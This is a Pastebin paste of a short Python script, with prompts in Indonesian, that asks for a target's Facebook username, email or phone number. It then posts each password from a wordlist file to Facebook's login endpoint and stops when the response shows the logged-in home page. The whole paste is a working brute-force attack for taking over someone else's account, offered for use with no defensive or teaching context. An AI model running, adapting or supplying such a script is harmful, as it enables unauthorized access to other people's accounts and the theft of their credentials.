Advertisement
Guest User

Untitled

a guest
May 23rd, 2019
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. import sys
  2. import requests
  3.  
  4.  
  5. email = str(raw_input("Username (atau) Email (atau) Nomor Telepon Target : "))
  6.  
  7. url = "https://www.facebook.com/login.php?login_attempt=1"
  8.  
  9. ex = open('lst.txt', 'r').readlines()
  10.  
  11. for line in ex:
  12. password = line.strip()
  13. http = requests.post(url, data ={'email':email, 'pass':password, 'login':'submit'})
  14. content = http.content
  15. if "Beranda" in content:
  16. print "[!] GAS!",password
  17. sys.exit(1)
  18. else:
  19. print "[!] GABISA DI GAS ",password
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement